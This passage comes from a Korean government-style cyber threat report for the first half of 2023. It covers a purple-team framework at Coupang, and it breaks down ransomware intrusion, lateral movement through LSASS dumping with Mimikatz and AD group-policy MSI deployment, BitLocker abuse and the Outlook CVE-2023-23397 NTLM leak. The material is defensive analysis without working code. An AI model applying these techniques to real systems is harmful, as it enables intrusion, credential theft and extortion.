모니터링하는 언론사도 사고가 전이되는 등 감염이 연쇄적으로 확산될 수 있다.
우리는 일상생활 중 항상 언론기사를 접하며 살아가고 있으며 특정 현안에 대한 기사를 주변 사람들과 공유하기도
한다. 이러한 과정에서 워터링홀로 악용되는 언론사의 기사가 공유될 경우 보안 소프트웨어의 취약점이 발현되어
피해가 확산될 수 있다. 또한, 악용된 보안 소프트웨어는 인터넷 뱅킹과 같은 중요 서비스 사용 시 필수적으로
설치되는 소프트웨어이며, 약 20%의 시장점유율을 가진 것으로 알려져 있다. 이를 대응하는 과정에서 해당 취약점이
선제적으로 조치되지 않았다면 수백만명이 위협에 노출되었을 것이다.
19
결론 및 시사점
국내 침해사고를 분석해보니 기업의 Active Directory와 같은 중앙 관리 솔루션을 장악한 후 악성코드를 내부에

유포하는 기법에서 보안 소프트웨어의 제로데이 취약점을 악용한 것으로 변화했다. 이 밖에도 북한 해킹그룹의
공격이 꾸준히 이어지고 있는 가운데 그룹 간 공격 기법 및 도구가 중복되는 상황이라 해킹 그룹의 구분이
희미해지고 있다.
공격자의 공격 기법이나 도구는 언제나 방어 환경의 특성과 맞물려 있다. 공격의 흐름과 과정을 패턴이나 기법이
아닌 전략 전술 관점으로 보아야 하며 더욱 적극적인 보안 대책이 필요하다. 또한, 제로데이 취약점을 최소화하기
위해 개발 환경에서 보안 취약점을 발생하지 않도록 환경 조성이 필요하며, 취약점 발견 시 신속한 대응 또한 매우
중요하므로 공격을 바로 확인할 수 있는 가시성 확보가 중요하다.
20
2023년 상반기
보고서
Part. 2
Insights┃ 전문가 컬럼
2-1. 쿠팡 Blueteam 곽성현 Staff Security Engineer :
맞춤형 공격 대응을 위한 기업 내 보안조직 운영 방안
2-2. 한국랜섬웨어침해대응센터 이경호 과장 :
랜섬웨어 공격 구조와 취약점 패치의 중요성
2-3. 고려대학교 SW보안연구소 최윤성 교수 :
3CX 연쇄 소프트웨어 공급망 공격 사건과 시사점
2-4. 한국전자통신연구원 사이버보안연구본부 김익균 :
사이버 억지력 강화를 위한 「Defend Forward」
전략의 이해
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Part. 2
맞춤형 공격 대응을 위한 쿠팡 Blueteam 곽성현

2-1 기업 내 보안조직 운영 방안 Staff Security Engineer
SDLC는 왕이다
OWASP에서는 SDLC(Software Development Life Cycle)는 왕으로 표현하고 있다.1) 그만큼 보안에서 SDLC를
중요하게 생각한다. 조직 내에서 이미 수행 중인 보안 활동을 SDLC의 각 단계에 통합함으로써 어플리케이션 보안에
대한 전체적인 접근이 가능하다. 각 조직에서 사용하는 SDLC 모델에 따라 다양한 단계의 이름을 사용할 수 있지만
개념적인 단계는 아래와 같다.
그림 1-1 일반적인 SDLC 모델
보안 조직에서는 각 단계별로 비용 효율적이고 포괄적인 보안 활동을 마련해 기존 어플리케이션 개발 프로세스의

일부가 되야 한다. 각 단계별 적절한 보안 활동을 수행하지 못 할 경우 위험에 따른 완화 비용이 비례하게 상승하기
때문이다. 또, 취약점의 경우 취약점 발견 후 패치가 되더라도 여전히 리스크가 존재한다.
1) https://owasp.org/www-project-web-security-testing-guide/stable/2-Introduction/README#The-OWASP-Testing-Project
22
전문가 칼럼
그림 1-2 취약점 리스크 레벨
지속적인 개발 사이클과 쉽게 줄어들지 않는 취약점 리스크를 감안하면 보안 조직에서는 전략적인 접근이 필요하다.
테스트 대상을 명확하게 정의하고 사전 교육, 빈도 높은 테스트, 테스트 자동화를 통해 목표를 달성할 수 있다.
테스트의 대상과 내용은 아래와 같다.
사람(People): 적절한 보안 교육과 인식이 있는지 확인한다.
프로세스(Process): 적절한 보안 정책과 표준이 있고, 사람들이 해당 정책을 따르는 방법을 알고 있는지
확인한다.
기술(Technology): 프로세스가 효과적으로 구현되었는지 확인한다.
사전 교육을 통해 SDLC 초기에 버그를 감지한다면 더 빠르고 저렴한 비용으로 문제를 해결할 수 있다. 보안 버그는
기능이나 성능 기반 버그와 다르지 않기 때문에 개발 및 QA팀을 대상으로 발생 가능한 일반적인 보안 문제와
이를 감지하는 방법에 대해 교육하면 된다. 또한, 보안 테스트 교육은 개발자가 공격자의 관점에서 애플리케이션을
테스트하기 위한 적절한 사고 방식을 습득하는데 도움이 되며 보안 문제를 보안팀의 이슈가 아닌 개발관련 모든
조직의 이슈로 고려할 수 있게 한다.
애자일과 같은 빠른 개발 환경에서는 모든 보안 요구 조건을 테스트하기 불가능 하기 때문에 빈도 높은 테스트를

수행한다. 개발 스프린트 일정에 맞춰 우선 순위 높은 보안 요구 조건을 테스트하는 방법으로 목표를 달성할 수
있다.
23
전문가 칼럼
애자일, DevOps/DevSecOps/Rapid Application Development와 같은 현대적인 개발 방법론에서는 CI/CD

워크플로우에 보안 테스트를 통합해야 한다. 테스트 자동화를 이용하면 베이스라인 보안 분석과 가볍게 해결 가능한
보안 결함을 식별할 수 있다. 이를 수행하기 위한 방법은 아래와 같다.
DAST(Dynamic Application Security Testing)
SAST(Static Application Security Testing)
SCA(Software Composition Analysis)
보안 조직의 입장에서 SDLC에 적절한 보안 활동을 통합시키는 것은 쉽지 않다. 비지니스 우선 순위와 개발 일정을
모두 고려하기 때문이다. 꾸준한 논의와 비니지스 정당성, 리스크 임팩트에 대한 설명 등 지속적인 커뮤니케이션을
통해 발전시켜 나가야 한다. 하지만 통합을 이뤘다고 리스크를 완벽하게 완화시켰다고 확신할 수 없다. 이때 우리는
보안 보증 성숙도 모델(SAMM; Security Assurance Maturity Model)을 통해 현재의 성숙도를 파악하고 보다 높은
성숙도를 갖기 위한 로드맵을 찾을 수 있다.
OWASP SAMM2)
SAMM은 Security Assurance Maturity Model의 약자로 모든 유형의 조직이 소프트웨어의 보안 상태를 분석하고
개선할 수 있도록 측정 가능한 방법을 제공하는 성숙도 모델이다. SAMM의 상위 레벨에서는 5가지의 비지니스
기능을 정의한다. 각 비지니스는 소프트웨어 개발과 관련된 모든 조직의 활동 범주이다.
Business Functions: Governance / Design / Implementation / Verification / Operations
그림 1-3 SAMM 모델 개요
2) https://www.opensamm.org/
24
전문가 칼럼
각 비지니스 기능(Business Functions)은 15가지 보안 활동(Security Practice)으로 구성된다. 각 보안 활동은

3단계의 보안 성숙도(Maturity Levels)로 구분되며 낮은 성숙도 수준의 활동은 더 높은 성숙도 수준의 활동보다
실행하기 쉽다.
그림 1-4 SAMM 구조
보안 활동은 논리적으로 그룹화된 두 개의 스트림이 있다. 스트림은 보안 활동의 다양한 측면을 다루며 각 성숙도
수준에 걸쳐 보안 활동을 조정하고 연결하는 목표를 갖고 있다.
그림 1-5 SAMM 성숙도 모델
25
전문가 칼럼
조직에서는 SAMM 모델을 활용해 아래와 같은 업무를 할 수 있다.
조직의 현재 소프트웨어 보안 태세 평가
조직의 목표 정의
목표 달성을 위한 구현 로드맵의 정의
특정 활동을 실행하는 방법에 대한 규범적 조언
퍼플팀(Purple Team)
SAMM의 비지니스 기능 중 Verification은 레드팀의, Operations는 블루팀의 역할로 볼 수 있다. Verification은
아키텍처 평가, 요구 사항 기반 테스트, 보안 테스트로 보안 활동이 구성된다. 하지만 대부분의 조직에서는 비지니스
우선 순위와 리소스 문제로 인해 웹 서비스 기반 보안 테스트에 대한 보안 활동에 중점을 둔다.
보안 활동(Security Practice) Stream A Stream B
아키텍처 평가(Architecture Assessment) Architecture Validation Architecture Mitigation
요구 사항 기반 테스트(Requirements-driven Testing) Control Verification Misuse/Abuse Testing
보안 테스트(Security Testing) Scalable Baseline Deep Understanding
표 1-1 Verification Overview Table
Operations 또한 사고 관리, 환경 관리, 운영 관리로 보안 활동이 구성되지만, 사고 관리에 대한 보안 활동이 높은

우선 순위를 갖는다. 이는 결국 낮은 수준의 성숙도에 고착화되며 성숙도 향상이 어려운 조직으로 변할 수 있다.
보안 활동(Security Practice) Stream A Stream B
사고 관리(Incident Management) Incident Detection Incident Response
환경 관리(Environment Management) Configuration Hardening Patching & Updating
운영 관리(Operational Management) Data Protection Legacy Management
표 1-2 Operations Overview Table
쿠팡에서는 퍼플팀으로 이 문제를 해결하고 있다. 퍼플팀을 통해 레드팀의 테스트 영역의 한계를 조금씩 넓히고
블루팀의 탐지 범위를 확장한다. 정보 보안 조직의 리더들을 포함해 블루팀과 레드팀에서 가상의 퍼플팀을 구성한다.
퍼플팀 활동을 수행함으로써 참가자들은 공동으로 공격과 탐지, 대응을 하고 정보 보안 평가에 대한 전체 지식을
공유하게 된다.
26
전문가 칼럼
퍼플팀 프레임워크(Purple Team Framework)

쿠팡에서는 가상의 퍼플팀을 구성하기 전부터 산발적으로 발생하는 조직 전체의 이슈나 비지니스 임팩트가 있는
경우 관련 조직들이 함께 문제를 해결해 나갔다. 이를 통해 인지하지 못했던 공격 기술이나 취약점을 신규로
발견하고 관련된 탐지 룰의 유효성을 검증하거나 개선했다. 하지만, 업무에 대한 역할이 명확하지 않고, 목표 설정에
대한 논의가 없어 성숙도를 향상 시키기엔 부족했다. 이를 개선하기위해 자체적으로 퍼플팀 프레임워크를 개발해
도입했다.
퍼플팀 구성원의 역할과 책임

퍼플팀 프레임워크를 수행하기 위해서는 각 조직의 배려가 필요하다. 가상의 팀으로 운영되기 때문에 명확한 역할과
상위 의사 결정자들의 의사결정이 중요하다.
직책 역할 책임
퍼플팀 활동 전반을 리드하는 커뮤니케이션 포인트

퍼플팀 프로젝트
퍼플팀 활동 리드 퍼플팀 연습 실행의 진행 및 중개자 역할
매니저
결과 보고서 작성 및 액션 아이템 추적
CISO 서포터 퍼플팀 활동 및 예산 승인
블루팀 리더 서포터 블루팀 목표 설정, 참석자 선택
레드팀 리더 서포터 레드팀 목표 설정, 참석자 선택
사이버 위협 인텔리전스 기반 위협 모델링

CTI 참석자
공격자의 기회, 의도, 역량을 파악해 조직에 효과적인 TTP 구성
레드팀 참석자 퍼플팀 연습 실행을 위해 에뮬레이션 가능한 안정적인 페이로드 개발
위협 헌팅 참석자 퍼플팀 연습 실행을 위해 탐지 가능한 위협 헌팅 쿼리 개발
디텍션 엔지니어링 참석자 위협 모델링 된 TTP에 대한 탐지 규칙 점검
SOC 참석자 위협 모델링 된 TTP에 대한 대응 절차 점검
IR 참석자 위협 모델링 된 TTP에 대한 사고 대응 절차 점검
표 1-3 퍼플팀 구성원의 역할과 책임
27
전문가 칼럼
퍼플팀 프레임워크 구성
퍼플팀 프레임워크는 5 단계로 구성되며 각 단계는 아래 순서대로 수행한다. 전 단계를 수행하는 기간은 최소 한달이
소요되며, 분기에 한 번 수행을 목표로 한다.
단계 설명
위협 모델링 CTI 정보 기반 위협 모델링
레드팀 준비 기간 제로 지식 기반 공격 페이로드 개발
블루팀 준비 기간 제로 지식 기반 헌팅 쿼리 개발
퍼플팀 연습 실행 정보 보안 평가에 대한 전체 지식 공유
수행 결과 피드백 결과 보고서 작성 및 액션 아이템 수행
표 1-4 퍼플팀 프레임워크 구성
위협 모델링(Threat Modeling)
위협 모델은 심각도와 데이터를 기반으로 결정된다. CTI 정보를 기반으로 조직에 위협이 되는 모델을 목록화 화여
상위 의사 결정자들과 정기적인 회의를 갖는다. 회의에서는 심각도를 평가하고 비지니스에 따른 위협 모델의 우선
순위를 결정한다. 위협 모델이 결정되면 CTI 정보를 기반으로 위협 프로파일링 작업을 진행한다. 위협 모델의 대상은
외부 위협 뿐만 아니라 내부 위협도 포함한다.
그림 1-6 위협 모델 범위
기존의 사이버 위협 모델링 방식에서는 MITRE Attack Matrix3)를 이용한다. 해당 매트릭스는 지속적인 업데이트와
다양한 플랫폼을 포함하고 있어 일반적인 기업에서 사용하기에 훌륭하다. 하지만 특정 산업에만 존재하는 TTP의
경우 모델링하기 어렵기 때문에 쿠팡은 MITRE Attack Matrix를 포함하는 별도의 매트릭스를 개발해 운영하고 있다.
3) https://attack.mitre.org/matrices/enterprise/
28
전문가 칼럼
MITRE Attack Matrix를 이용해 위협 모델링 및 퍼플팀 활동을 준비한다면 VECTR4)와 CALDERA5)와 같은 플랫폼을
이용할 수 있다. 오픈소스 플랫폼으로써 모든 공격을 대상으로 모델링을 할 수 있으며, 에이전트를 이용한다면 공격
에뮬레이션과 자동 로그 수집을 할 수 있다.
그림 1-7 VECTR 데이터 구조
벡터에서는 어택 체인(Attack Chain) 단계 별로 TTP를 정의할 수 있다. 직관적인 인터페이스를 갖고 있어 위협

모델에 대한 지식의 갭을 극복하는데 도움이 된다.
그림 1-8 벡터 프로파일링 예시
4) https://vectr.io/
5) https://caldera.mitre.org/
29
전문가 칼럼
레드팀 & 블루팀 준비기간(Red Team and Blue Team Preparation)

레드팀 준비기간에는 프로파일링된 액터의 공격을 에뮬레이션하기 위한 페이로드를 개발한다. 레드팀의 활동은
별도의 격리된 환경에서 진행되며, 어떠한 로그도 남기지 않기 위해 노력한다. 로그를 남기지 않는 이유는
블루팀에서 미리 예측하지 못하게 하기 위함이다. 블루팀 준비기간도 마찬가지이다. 레드팀 준비기간과 함께
시작되며 프로파일링된 액터의 공격을 탐지할 수 있는 헌팅 쿼리를 개발하고 기존에 침해 기록이 있는지 점검한다.
그림 1-9 프로파일링 사용 사례
퍼플팀 연습 수행(Exercise Execution)

퍼플팀 연습 수행 때는 준비기간 동안에 레드팀에서 개발된 페이로드를 로그가 적재된 환경에서 하나씩 실행하며
블루팀 탐지 능력을 확인한다. 블루팀은 탐지 규칙의 동작 확인과 대응에 소요된 시간 측정, 그리고 사고 대응 절차
유무를 점검한다.
수행 결과 피드백(Lessons Learned)
퍼플팀 연습 수행이 끝나면 수행 결과를 피드백한다. 결과 보고서를 작성하고 퍼플팀 활동 중 발견된 액션
아이템들을 처리한다. 또, 레드팀 페이로드를 공유하고 탐지 룰에 대한 성능 개선을 한다.
30
전문가 칼럼
퍼플팀 보고서
그림 1-10 퍼플팀 결과 보고서
쿠팡에서는 정기적으로 퍼플팀 활동을 수행하면서 조직에 기대하는 부분은 아래와 같다.
1. 정보 보안 조직 내 협업 문화 육성
2. 위협 모델링을 통한 명확한 목표 설정
3. 조직에 특화된 공격 체인 테스트
4. 실습을 통한 참여자들의 지식 차이 축소
5. 제로 지식 기반 TTP 테스트
31
전문가 칼럼
Part. 2
랜섬웨어 공격 구조와 한국랜섬웨어침해대응센터

2-2 취약점 패치의 중요성 이경호 과장
랜섬웨어는 다크웹을 통해 진화하고 있으며, 비트코인을 이용해 수익을 분산시키는 방식으로 운영되고 있어 낮은
금액으로도 쉽게 악용될 수 있는 상황이다. 또한, 비트코인과 직접적으로 연결되는 범죄로 간주되어 관심을 받고
있기 때문에 기술력도 급속한 속도로 발전하고 있다. 랜섬웨어 공격 구조를 이해하기 위해 감염 사례를 살펴보고,
이를 통해 침입 및 감염 방법과 그 변화를 파악해 최근 동향을 파악하고자 한다.
악의적인 공격자가 파일 접근 및 실행 권한을 획득하면 다양한 방법을 사용해 악의적인 목적을 수행할 수 있다.
과거에는 랜섬웨어 공격이 주로 피싱 메일에 첨부된 실행 파일을 통해 침입 및 감염 단계를 수행하는 방식이
일반적이었다. 하지만, 보안 관심도가 높아지며 단순 형태의 공격이 무효로 돌아가므로 점차 기술 고도화를 통해
공개된 취약점으로 권한을 획득하고 EDR 솔루션에 의한 공격 실패를 회피하기 위한 공격기법이 꾸준히 발전하고
있는 현황이다.
한 가지 사례로, 권한을 획득하고 연관된 계정정보 기반으로 원격 데스크톱 프로토콜(RDP) 연결을 수행해 내부에
전파한다. 수직 및 측면 이동을 통해 피해 대상을 확장한 뒤 데이터를 암호화하거나 유출을 통한 공개 협박 방식으로
진행된다. 침입 단계 취약점 악용 방식은 최근 Outlook 기능을 악용한 취약점 CVE-2023-23397을 통해 문제
원인과 악용 과정을 알아보고자 한다. 이러한 사례를 통해 취약점 패치에 대한 지속적인 관심이 필요함을 역설적으로
강조한다.
32
전문가 칼럼
감염 사례를 통한 랜섬웨어 공격 구조
침입 전파 간염
[감염]
*E업체
귀신 랜섬웨어에서 사용되는 윈도우 설치파일(msi)을 통해 EDR 솔루션
감지를 우회하고 파일을 변조
*F업체:
공격자 원격 연결 및 스크립트 배포를 통해 Windows OS에서 지원하는
스토리지 암호화 프로그램(BitLocker)을 통해 변조
*G업체
DRM으로 암호화되어 저장된 파일서버에 데이터를 자동화툴을 통해
[침입] 복호화 작업 및 원본파일 유출
*A업체 공격자는 접촉을 통해 다크웹의 정보공개를 볼모로 비트코인 요구
재택근무 PC에서 악성코드가 포함된 글꼴 다운로드 행위로
백도어 설치
VPN 접속시 네트워크는 차단되나 기존 연결 세션이 [전파]
유지되어 원격 연결 유지 *C업체
공격자는 원격접속을 통해 비밀번호가 노출된 서버
*B업체
연결정보를 저장한 파일 획득
편의를 위해 파일서버로 사용되는 PC에 Brute-force
AD서버의 '그룹정책 자동프로그램설치' 기능을 통해
공격으로 계정인증이 이루어지고 MSSQL 원격코드
연결된 단말기에 실행 권한 획득
취약점 공격을 통해 PC의 실행 권한 획득
*D업체
실행 권한을 통해 스크립트를 통해 PC에 저장된
계정정보를 RDP 연결에 사용하여 감염 키트 전파
그림 2-1 실제 사례를 통해 구성된 랜섬웨어 공격 구조
날짜 산업군 고객사 초기침투 거점확보 권한상승 내부정찰 내부이동 지속실행 목표달성
렌섬웨어 (BltLocker)
파일 업로드 취약점 크리덴셜 탈취
2022-08-29 제조업 ㄱ사 WebShell - RDP -
(그룹웨어) (LSASS Dump)
정보 파괴 (NAS포맷)
Tunneling(ngrok) 크리덴셜 탈취 네트워크 스캔

2022-09-01 제조업 ㄴ사 악성메일 RDP 서비스 정보 유출(추정)
RAT(putty) (Mimikatz) (NetScan)
WebShell 네트워크 스캔 렌섬웨어 (LockBit 3.0)

RDP
어플리케이션 취약 Proxy(Plink) 크리덴셜 탈취 (NetScan)
2022-09-26 정보서비스업 ㄷ사 -
점 (Exchange) (Mimikatz) 정보 유출 (문서, 1.33TB)
원격제어도구 네트워크 스캔
WinRM
(TeamViewer) (Sharpl lound)
WebShell
관리자 계정 생성
파일 업로드 취약점 Proxy 크리덴셜 탈취
2023-02-16 제조업 ㄹ사 네트워크 스캔 RDP - 렌섬웨어 (BltLocker)
(자사 홈페이지) (Mimikatz)
VPN
원격제어도구
(PSExec)
그림 2-2 최근 랜섬웨어 공격 사례 요약
33
전문가 칼럼
1. 침입
외부에서 내부 PC 자원에 접근하기 위해서는 권한을 얻는 것이 필수적이다. B 업체의 경우, 작업을 위해 인터넷망과
연결된 PC에 RDP(원격 데스크톱 프로토콜) 공격을 통해 초기 침투가 확인됐다. 이 PC는 대용량 스토리지(SSD)를
연결하고 파일 서버와 같은 운영을 위해 폴더 공유 기능을 사용하고 있었는데, 계정과 비밀번호 관리가 소홀하게
이뤄졌다.
감염 PC 이벤트 뷰어 확인 결과, RDP 요청이 계속해서 이루어진 후 승인된 사실이 확인돼 Brute-force(무차별
대입) 공격을 통해 최초 권한을 획득한 것으로 판명됐다. 이는 살포형 랜섬웨어로 분류되며, 스크립트 형태로 구성된
일련의 공격 킷으로 구성돼 침입, 전파, 감염 행위를 수행한다. 공격 방식은 최근 공개된 취약점을 이용한 zero/one
day Attack, 보안 설정이 되지 않은 PC의 default 값을 이용한 공격이 대표적이다.
그림 2-3 이벤트 뷰어, RDP 접속요청 내역 '응용 프로그램 및 서비스 로그'

'Microsoft' - 'Windows' - 'TerminalServices-RemoteConnectionManager' - 'Operational'
타겟형 랜섬웨어는 매출 규모와 보안 투자 비용을 비교해 특정 업체를 선정하는 방식으로 진행된다. 공개된 담당자
메일주소에 공공기관을 사칭하거나 업무와 관련된 내용을 꾸며 전달한 피싱 메일의 링크나 문서파일 매크로를 통해
침입하는 방법이 대표적이다.
34
전문가 칼럼
그림 2-4 최근 접수된 피싱 메일
외부로부터 내부 PC의 권한을 획득하기 위한 침입 과정은 외부에서 내부로 접근하는 방안을 통해 이뤄지므로
제한적이며, 주로 다음과 같은 방법으로 진행된다. 특히, 보안 관리가 소홀한 일반 PC에서 이뤄지는 경우가 많다.
또한, 최근 팬데믹 이후 재택근무 형태가 유지되면서 범죄 발생률이 더욱 증가하고 있다.
1. 일반 PC를 통한 내부망 전파
침입자는 일반 PC를 감염시킨 후, 내부 네트워크로 전파해 중요 자원에 접근하거나 서버 취약점을 이용해 침투한다.
2. 보안 관리 소홀로 인한 위험
업무 편의성을 위해 일반 PC에서 보안 관리가 소홀해지는 경우가 많다. 이로 인해 침입자들은 취약한 보안 설정을
타깃으로 삼아 침투를 시도한다.
35
전문가 칼럼
3. VPN 연결을 통한 침입
재택근무로 인해 VPN 연결을 통해 근무하는 경우, 글꼴 다운로드 등을 통해 감염된 재택 PC에서 네트워크 차단이
이뤄져도 기존 연결됐던 세션이 유지될 수 있어 침입 경로로 이용될 수 있다.
4. 다양한 침입 방법
RDP 접근, MSSQL 서버의 취약한 계정(sa)을 이용한 원격 코드 실행, 피싱 메일을 통한 악성 코드 실행 또는 첨부
파일 실행 등 다양한 방법으로 침입이 시도된다.
2. 전파(수직/측면 이동)
해커가 침입한 PC는 감염 가능한 상태로 변화하며, 내부 망의 다른 PC에 추가적인 감염을 위한 출발점으로
사용된다. 이러한 과정에서 주로 사용되는 방법 중, 하나는 크리덴셜 덤핑 공격(Credential Dumping Attack)이다. 이
공격은 다음과 같은 방식으로 동작한다.
1. 로컬 보안 프로세스(Lsass.exe)를 통한 데이터 저장
연결된 인증 정보 및 저장된 정보는 로컬 보안 프로세스(Lsass.exe)에 저장된다. 이 프로세스의 메모리에는 계정
정보와 관련된 데이터가 저장돼 있다.
2. 메모리 데이터 추출 및 덤프 파일 생성
해커는 로컬 보안 프로세스(Lsass.exe) 메모리 데이터를 추출해 덤프 파일로 저장한다. 이 과정에서 보안 솔루션(예:
Windows Defender, EDR 솔루션 등)에 의해 보호되지만, 해커는 덤프 과정에 변화를 주거나 파일을 난독화해 이를
우회할 수 있다.
3. 덤프 파일 분석
덤프 파일은 해킹 도구인 Mimikatz와 같은 도구를 사용해 분석될 수 있다. 이를 통해 PC에 저장된 계정 정보를
추출할 수 있다. 일반적인 정보는 비밀번호 해시값으로 표시되지만, SMB 프로토콜과 같이 연결된 계정 정보는
평문으로 비밀번호가 표시되는 특징이 있다.
4. 크리덴셜 덤핑 공격
해커가 PC에 저장된 계정 정보를 획득하는 데 사용되는 공격 방법 중 하나이다. 이를 통해 해커는 추가적인 공격을
수행하거나 인증 정보를 악용할 수 있다.
36
전문가 칼럼
그림 2-5 Mimikatz 툴을 통해 분석한 계정정보
배포 권한을 가진 서버는 특별한 주의가 필요하다. 특히 AD서버(Active Directory Server)나 NAC(Network Access
Control) 서버는 계정 정보 없이도 배포 권한을 가지므로 공격자에게 권한이 넘어가면 시스템을 완전히 장악하는
것과 같은 심각한 상황이 발생할 수 있다.
예를 들어, AD서버는 클라이언트 사용자에게 그룹 정책을 통해 윈도우 설치 파일(msi)을 자동으로 전달해

실행시키는 기능을 지원한다. 실제로 2023년 3월, A병원에서 그룹 정책 파일(gpo)이 예정 없이 배포돼 확인해 보니
AD서버가 감염돼 랜섬웨어 파일이 전파된 사례가 있었다.
전파된 윈도우 설치 파일(msi)은 윈도우 인스톨러(msiexec.exe)를 통해 동작한다. 설치 파일에 포함된 라이브러리

파일(dll)의 코드를 실행, C&C(Command and Control) 서버와 통신해 감염 코드를 수신하고 실행한다. 이러한 방식은
악의적인 목적을 수행하기 위해 메모리에서 코드를 실행하는 파일리스(Fileless) 방식으로 알려져 있으며, 귀신
랜섬웨어(Gwisin Ransomware)에서 주로 사용되는 방법이다.
37
전문가 칼럼
3. 감염
공격자는 악의적인 목적을 달성하기 위해 획득한 권한을 기반으로 여러 기법을 이용한 악성 행위를 수행한다. 최근
랜섬웨어 공격기법은 EDR 솔루션 탐지 회피를 위해 다음과 같은 공격기법을 가진다.
1. 파일리스(Fileless) 기법을 통한 감염
이 기법은 OS(Windows)에서 지원하는 특정 파일(.bat, .jar, .js 등)에 악성 코드를 저장하는 대신, 해당 파일에
담긴 데이터를 자체 프로세스로 실행하는 기능을 활용한다. 예를 들어, JavaScript 파일은 WSH(Windows based
Script Host) 프로세스(wscript.exe)를 통해 실행될 수 있다. 이런 스크립트 코드는 외부 라이브러리(dll) 파일과 같은
악성 코드를 수신하고 실행하기 때문에 공격 추적이 어렵다. EDR 솔루션은 공개된 취약점을 통해 보호 로직을
구성하지만, 코드로 이루어져 있기 때문에 변종 내역을 탐지하기 어려울 수 있다. 이를 보완하기 위해서는 새로운
취약점에 대한 지속적인 보완이 필요하다.
그림 2-6 js파일 연결 프로그램(WSH)
2. BitLocker를 통한 영역 암호화
BitLocker는 Windows 운영체제에서 드라이브 데이터를 보호하기 위해서 사용되는 전체 디스크 암호화를
지원하는 프로그램이다. 보안 설정에 따라 비활성화된 경우도 있으나 ‘그룹 정책 관리’이나 레지스트리 값 변경을
통해 활성화가 가능하다. 복구 키를 파일 형태로 저장하고 유출하는 방식으로 진행되며, 운영체제에서 제공하는
기능이므로 사용자의 정상 행동인지, 공격자의 행위인지 판단 기준이 모호해 관리되지 않는 경우가 대다수이다.
38
전문가 칼럼
운영체제 드라이브가 감염된 경우 재부팅 시 복구 키를 통해 데이터 복원이 진행돼야 부팅이 가능하다. 일반적으로
공격자는 담당자 이메일을 통해 접촉해 복구 키를 담보로 거래를 요청한다. 또한, 위의 과정은 공격자가 원격 접속
권한을 통해 작업하는 경우도 존재하지만, 스크립트 형태로 일련의 구성이 가능하므로 실행 권한을 통해 동작하는
살포형 랜섬웨어의 감염행위로도 이용된다.
그림 2-7 BitLocker 활성화 및 암호키 저장화면
3. 정보 유출을 통한 다크웹 공개 협박
랜섬웨어 공격 방식은 파일을 사용할 수 없도록 변조하는 것에 국한되지 않고, 악의적인 목적을 달성하기 위해
다양한 전략을 사용한다. 특히, 해킹형 랜섬웨어는 기업의 매출 내역, 보안 산업에 대한 투자 비율, 데이터의 가치
등을 비교해 목표를 정하므로 목적에 맞는 기법을 변동적으로 사용한다. 최근에는 국가 기밀로 판단되는 기술을
소유한 기업 대상으로 정보 유출을 담보로 금전을 요구하는 방식이 흔히 사용되고 있다.
공격 조직은 다크웹에 사이트를 운영하며, 취약한 기업 카테고리에 속하는 기업 중 거래에 응하지 않은 기업

데이터를 공개하거나, 일부 금액을 대가로 판매한다. 이 방식의 주요 특징은 거래를 승인하면 유출 사건을 무효로
한다는 인식을 주는 것이다. 파일 감염이 없었기 때문에 기업의 업무에 직접적인 영향을 주지 않으며, 거래에 응하게
되면 데이터 파기를 약속하고 감염 경로를 통한 취약점 분석을 지원한다고 주장한다. 따라서 공격 조직은 피해
기업에 높은 보안 컨설팅 비용을 지불하는 행위라고 주장하며 거래를 유도한다. 개인정보를 취약하게 관리한 기업은
개인정보보호법에서 강화된 처벌 규정에 직면하게 된다. 벌금을 지불해야 하고 기업의 이미지가 훼손될 수 있으므로
이러한 사안은 심각한 고려사항이 된다.
39
전문가 칼럼
그러나 거래 이후의 과정은 공격 집단의 선택에 따라 결정되는 사항임을 인지할 필요가 있다. 실제로 거래에 응하고
대가를 지불한 후에도 주요 데이터를 파기하지 않고 별도 구매자를 찾아가는 사례가 있다. 때로는 해당 기업에
2차 공격을 수행해 파일을 변조하는 사례도 있다. 따라서 기업은 거래에 동의하는 대신 공격자를 신고해 추적하는
방향을 우선으로 고려해야 한다.
또한, 이러한 공격을 예방하기 위해서는 보안에 대한 지속적인 강화와 주의가 필요하다. 시스템 및 데이터 보호에
대한 강력한 조치, 취약점 관리, 교육 및 인식 향상 등의 수행이 요구된다.
그림 2-8 해커와 라이브 챗팅 사례
그림 2-9 최근 다크웹에 공개된 바이오기업 데이터
40
전문가 칼럼
Outlook 취약점(CVE-2023-23397)을 통한 최신 패치의 중요성 확인

Outlook은 Microsoft가 개발한 이메일 및 개인 정보 관리 소프트웨어로, 사용자는 약속을 설정하고 일정을 잊지
않도록 알림을 받는 "미리 알림" 기능을 제공한다. 이 기능은 사용자가 원하는 사운드 파일을 설정할 수 있으며, 이
파일은 SMB 서버와 같은 네트워크 경로에 위치할 수 있다. 그러나 이에는 취약점이 존재한다.
악의적인 공격자가 작성한 이메일을 수신한 사용자가 해당 이메일의 미리 알림 사운드 파일을 설정하기 위해
공격자의 SMB 서버에 접근하면, 인증이 강제로 이뤄지게 된다. 이 과정에서 인증을 위해 사용되는 NTLM 계정의
비밀번호 해시(HASH)가 공격자에게 노출되고, 이는 추가적인 침입 과정에서 악용될 수 있다.
일반적으로 취약점이 공개된 후 패치가 나오기까지는 시간이 소요된다. 이 기간에 취약점을 이용한 공격을 zero-
day 공격이라 한다. 그리고 취약점 패치가 나온 후에도 해당 패치를 적용하지 않은 시점 이전의 공격은 one-day
공격으로 분류된다.
해당 취약점은 2023년 3월 14일에 공개됐으며, 심각도 점수(CVSS)로는 매우 높은 9.8점으로 평가됐다. 패치는

발표 직후 진행, 3월 정기 업데이트를 통해 Microsoft에서 배포됐다. 그러나 기업의 환경 문제로 인해 Windows 최신
업데이트 적용이 어려운 경우, 취약점을 통해 계정 정보를 탈취하는 one-day 공격 위험이 더욱 증대될 수 있다.
기업은 가능한 이른 시일 내에 취약점 패치를 적용하는 것이 중요하다. 패치를 적용할 수 없는 상황이라면, 보안

대책을 강화해 공격 위험을 최소화해야 한다. 이는 추가적인 보호 조치를 통해 공격자의 침투를 어렵게 만드는 것을
의미한다. 보안 솔루션의 강화, 엄격한 접근 제어, 이상 징후 탐지 시스템 등을 활용해 기업의 보안 수준을 높이는
것이 필요하다. 그리고 주기적인 보안 감사와 취약점 스캐닝을 통해 시스템에 존재하는 취약점을 식별하고 대응법을
간구하는 과정이 안전한 보안 시스템을 유지하는데 필수적이다.
그림 2-10 Outlook 미리 알림 및 알림 소리 지정 화면
41
전문가 칼럼
Hacker SMB Server
1 취약점을 통한 악성 메일 전달 2 사운드 파일 경로 접근을

